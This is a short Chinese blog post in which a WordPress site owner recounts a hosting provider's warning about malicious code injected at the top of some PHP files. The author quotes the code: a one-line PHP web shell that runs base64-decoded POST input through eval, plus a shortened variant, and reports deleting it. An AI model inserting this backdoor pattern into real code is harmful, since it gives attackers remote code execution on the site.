早上起来收到bluehost的邮件,称我的帐户里面有恶意代码,都是针对wordpress,并且列举如下:
<?php if ($_POST["php"]){eval ( base64_decode($_POST["php"]));exit;} ?>
eval ( base64_decode($_POST["php"]));
<?php eval ( base64_decode("balabala……balabala")); //这段之所以有简略和增加空格是因为怕被防火墙ban掉
查看了一下文件,发现是在有些php文件的头部分加入了这个东西,这个东西之前并没有看到,删掉之后也没有什么影响。
一直没有很重视安全这一块,如今终于被黑,算是寡人踏入本领域的一个标志性事件吧。